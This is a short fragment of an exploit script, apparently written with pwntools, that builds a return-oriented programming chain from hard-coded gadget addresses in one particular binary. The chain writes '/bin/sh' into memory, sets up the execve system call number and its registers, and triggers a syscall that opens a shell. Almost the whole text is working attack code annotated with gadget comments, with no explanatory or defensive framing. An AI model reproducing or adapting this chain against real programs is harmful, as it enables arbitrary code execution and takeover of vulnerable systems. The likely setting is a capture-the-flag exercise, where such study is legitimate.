payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x404319)
# 0x0000000000404319: pop rdx; mov ebx, 0xffffffff; mov eax, ebx; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x40a050)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x404fe3)
# 0x404fe3: mov qword ptr [rdx + 0x20], rdi ; ret
payload += p64(0x404319)
# 0x0000000000404319: pop rdx; mov ebx, 0xffffffff; mov eax, ebx; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x404e37)
# 0x404e37: mov eax, edi ; ret
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40a070)+p64(0x402243)
# 0x0000000000402243: syscall; 
payload += b''
